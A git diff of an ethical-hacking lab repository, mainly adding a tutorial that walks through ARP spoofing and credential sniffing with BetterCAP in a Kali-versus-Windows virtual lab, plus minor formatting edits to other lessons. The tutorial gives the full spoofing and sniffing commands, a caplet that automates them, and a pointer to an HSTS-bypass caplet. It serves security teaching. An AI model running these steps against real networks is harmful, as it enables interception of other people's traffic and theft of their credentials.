updated

10-Session-Hijacking/0-Introduction.md

@@ -2,7 +2,7 @@
 The Session Hijacking attack consists of the exploitation of the web session control mechanism, which is normally managed for a session token.
 
 <p align="center">
-  <img width="70%" src="https://www.greycampus.com/ckeditor_assets/pictures/231/content_ses.hij.intro.bmp" />
+  <img width="50%" src="https://www.greycampus.com/ckeditor_assets/pictures/231/content_ses.hij.intro.bmp" />
 </p>
 
 Because http communication uses many different TCP connections, the web server needs a method to recognize every user’s connections. The most useful method depends on a token that the Web Server sends to the client browser after a successful client authentication. A session token is normally composed of a string of variable width and it could be used in different ways, like in the URL, in the header of the http requisition as a cookie, in other parts of the header of the http request, or yet in the body of the http requisition.
@@ -11,9 +11,9 @@ The Session Hijacking attack compromises the session token by stealing or predic
 
 The session token could be compromised in different ways; the most common are:
 
-* Predictable session token;
-* Session Sniffing;
-* Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc);
+* Predictable session token
+* Session Sniffing
+* Client-side attacks (XSS, malicious JavaScript Codes, Trojans, etc)
 * Man-in-the-middle attack
 * Man-in-the-browser attack
 

10-Session-Hijacking/2-Intercepting-HTTP-Traffic.md

@@ -0,0 +1,140 @@
+# Intercepting HTTP Traffic 
+BetterCAP is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.
+
+<p align="center">
+  <img width="30%" src="https://raw.githubusercontent.com/bettercap/media/master/logo.png" />
+</p>
+
+Bettercap Official Documentation: https://www.bettercap.org/intro/
+
+Official Repo: https://github.com/bettercap/bettercap
+
+### Objectives 
+* Intercept Traffic and sniff out user credentials from a network
+
+### Requisites
+* Kali Linux virtual machine (Attacker)
+* Any Windows virtual machine (Target)
+
+***
+
+## Install BetterCAP
+Launch your Kali Linux, open a new Terminal window and type the following commands:
+
+`apt-get update`<br>
+`apt-get install bettercap`
+
+## BetterCAP modules 
+To launch the program, type `bettercap` and specify your current network interface: 
+
+`bettercap -iface eth0`
+
+Type **help** to list all modules available:
+
+`help`
+
+![modules](https://gist.githubusercontent.com/Samsar4/62886aac358c3d484a0ec17e8eb11266/raw/7e4aa214016257e51ca5c19231801f0554de6134/bettercap-1.png)
+
+The module **events.stream** is **running** by default, this module is enabled by default and is responsible for reporting events (logs, new hosts being found, etc) generated by other modules during the interactive session. Moreover, it can be used to programmatically execute commands when specific events occur.
+
+**To perform a MITM attack we will use these modules below:**
+
+module | about 
+-- | --
+`net.probe` | When activated, this module will send different types of probe packets to each IP in the current subnet in order for the net.recon module to detect them. [[+]](https://www.bettercap.org/modules/ethernet/net.probe/)
+`net.recon` | This module is responsible for periodically reading the system ARP table in order to detect new hosts on the network. [[+]](https://www.bettercap.org/modules/ethernet/net.recon/)
+`arp.spoof` | This module keeps spoofing selected hosts on the network using crafted ARP packets in order to perform a MITM attack. [[+]](https://www.bettercap.org/modules/ethernet/spoofers/arp.spoof/)
+`net.sniff` | This module is a network packet sniffer and fuzzer supporting both BPF syntax and regular expressions for filtering. It is also able to dissect several major protocols in order to harvest credentials. [[+]](https://www.bettercap.org/modules/ethernet/net.sniff/)
+
+_You can type `help` following with the `module` name to grab some details about:_<br>
+![b2](https://gist.githubusercontent.com/Samsar4/62886aac358c3d484a0ec17e8eb11266/raw/c2be3479c96a94b3d2c042e8c8c4df20a4a06b57/bettercap-2.png)
+
+
+## Setting up the Modules to perform an ARP spoofing
+
+
+1. Start the **prober** module to send different types of probe packets to each IP in the current subnet in order for the **net.recon** module to detect them. _(Note: the prober module may start automatically the net.recon module)._<br><br>
+`net.probe on`
+
+```
+10.0.2.0/24 > 10.0.2.42  » net.probe on
+10.0.2.0/24 > 10.0.2.42  » [11:43:32] [sys.log] [inf] net.probe starting net.recon as a requirement for net.probe
+10.0.2.0/24 > 10.0.2.42  » [11:43:32] [endpoint.new] endpoint 10.0.2.3 detected as 07:00:27:11:6c:7d .
+10.0.2.0/24 > 10.0.2.42  » [11:43:33] [endpoint.new] endpoint 10.0.2.43 detected as 07:00:27:81:d6:f2 .
+```
+In my lab, the **10.0.2.43** is my Windows virtual machine, this may differ from your virtual environment.
+
+2. Start network hosts discovery:<br><br>
+`net.recon on`
+
+* Note: you can type `net.show` to view all the connected clients viewing the IP addresses and MAC addresses.
+
+3. Set the **arp.spoof** module option **fullduplex** to **true**. When you set to true, both the targets and the gateway will be attacked, otherwise only the target (if the router has ARP spoofing protections in place this will make the attack fail).<br><br>
+`set arp.spoof.fullduplex true`
+
+4. Specify the target to spoof. _(A comma separated list of MAC addresses, IP addresses, IP ranges or aliases to spoof)._<br><br>
+`set arp.spoof.targets 10.0.2.43`
+
+5. Start ARP spoofer:<br><br>
+`arp.spoof on`
+
+```
+10.0.2.0/24 > 10.0.2.42  » [12:03:58] [sys.log] [inf] arp.spoof enabling forwarding
+10.0.2.0/24 > 10.0.2.42  » [12:03:58] [sys.log] [war] arp.spoof full duplex spoofing enabled, if the router has ARP spoofing mechanisms, the attack will fail.
+10.0.2.0/24 > 10.0.2.42  » [12:03:58] [sys.log] [inf] arp.spoof arp spoofer started, probing 1 targets.
+```
+
+6. Start the packet sniffer:<br><br>
+`net.sniff on`
+
+7. Type `help` to list the modules running:<br><br>
+![modules2](https://gist.githubusercontent.com/Samsar4/62886aac358c3d484a0ec17e8eb11266/raw/9b7efcd559aef438cbbf1aa8a14ceeced52b19d5/bettercap-3.png)
+
+### The ARP spoofing
+Bettercap is fooling the **router** and the **target machine(Windows)**, putting the **attacker machine(Kali)** on the middle of the connection.
+
+![arp](https://gist.githubusercontent.com/Samsar4/62886aac358c3d484a0ec17e8eb11266/raw/913307b303fe83f04dd10b2c9760fe370e95a1e6/arp-4.png)
+
+**On my Windows** machine, I will use the **arp table command** to see what is going on:
+
+![arp5](https://gist.githubusercontent.com/Samsar4/62886aac358c3d484a0ec17e8eb11266/raw/af2872eca1b4d3ecf5c2b3979d8ffd33d1652186/arp-5.png)
+
+As you can see, the Windows machine 'thinks' the **router** MAC address is the same as the **Kali** since the ARP table is spoofed.
+
+
+### Generate some generic traffic on the Target machine.
+
+1. Log into your Windows virtual machine.
+2. Launch the browser and type the URL: http://testhtml5.vulnweb.com
+3. Login into this vulnerable-testing-website with sample credentials: **user: admin | password: password**.
+
+### Grabbing and analyzing every request
+* Back to your Bettercap on Kali machine and analyze all the requests sent from the Windows.
+
+![b7](https://gist.githubusercontent.com/Samsar4/62886aac358c3d484a0ec17e8eb11266/raw/e27e815cbb390ab5c7d5928fe897f49a71cf73ce/bettercap-7.png)
+
+As you can see, we captured the credentials sent to the website. Anything that the target machine sent and received will be captured by Kali Linux machine.
+
+_**Note**: this technique works on HTTP websites not HTTPS. To perform such action you need to bypass the HSTS (HTTP Strict Transport Security). You can perform this technique using Bettercap and [hstshijack](https://github.com/bettercap/caplets/tree/master/hstshijack) caplet._
+
+## Automate BetterCAP using Caplets
+To be more efficient on your work, you can automate the modules setup part by creating a simple **Caplet file**(file.cap) and adding the commands per line.
+
+1. Create the caplet:<br><br>
+`touch spoof.cap`
+
+2. Add the commands and save it :<br><br>
+`nano spoof.cap`
+
+```sh
+net.probe on
+set arp.spoof.fullduplex true 
+set arp.spoof.targets 10.0.2.5
+arp.spoof on
+set net.sniff.local true
+net.sniff on
+```
+As you can see is the same commands in order that you used previously.
+
+3. Start the **Bettercap** using the spoof **Caplet** that you created:<br><br>
+`bettercap -iface eth0 -caplet spoof.cap`

3-Enumeration/1-Enumerating-with-Nmap.md

@@ -73,7 +73,7 @@ We only need the second line of this output starting with **"64 bytes(...)"** th
 
 `ping -c 5 8.8.8.8 | grep "64" | cut -d " " -f 4 | tr -d ":" ; > iptest.txt`
 
-```
+```sh
 8.8.8.8
 8.8.8.8
 8.8.8.8
@@ -91,7 +91,7 @@ Breaking down the one-liner command (by pipe):
 
 1. Create a file .sh (pingsweep.sh)
 
-```
+```sh
 #!/bin/bash 
 
 if [ "$1" == "" ]

7-Sniffing/1-MITM-with-Bettercap.md

@@ -3,7 +3,7 @@
 <p align="center">
   <img width="30%" src="https://raw.githubusercontent.com/bettercap/media/master/logo.png" />
 </p>
-bettercap is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks..
+BetterCAP is a powerful, easily extensible and portable framework written in Go which aims to offer to security researchers, red teamers and reverse engineers an easy to use, all-in-one solution with all the features they might possibly need for performing reconnaissance and attacking WiFi networks, Bluetooth Low Energy devices, wireless HID devices and Ethernet networks.
 
 _Bettercap Official Documentation: https://www.bettercap.org/intro/_
 
@@ -133,7 +133,7 @@ To be more efficient on your work, you can automate the modules setup part by cr
 2. Add the commands and save it :<br><br>
 `nano spoof.cap`
 
-```
+```sh
 net.probe on
 set arp.spoof.fullduplex true 
 set arp.spoof.targets 10.0.2.5

README.md

@@ -76,7 +76,9 @@ This is a collection of tutorials and labs made for  ethical hacking students, c
     * [Detecting DoS Traffic](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/9-Denial-of-Service/3-Detecting-DoS-Traffic.md)
 10. **Session Hijacking**
     * [Introduction](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/10-Session-Hijacking/0-Introduction.md)
-    * [Using ZAP - Zed Attack Proxy](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/10-Session-Hijacking/0-Introduction.md)
+    * [Using ZAP - Zed Attack Proxy](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/10-Session-Hijacking/1-Using-ZAP.md)
+    * [Intercepting HTTP Traffic](https://github.com/Samsar4/Ethical-Hacking-Labs/blob/master/10-Session-Hijacking/2-Intercepting-HTTP-Traffic.md)
+
 11. **Evading IDS, Firewalls, and Honeypots**
 12. **Hacking Web Servers**
 13. **Hacking Web Applications**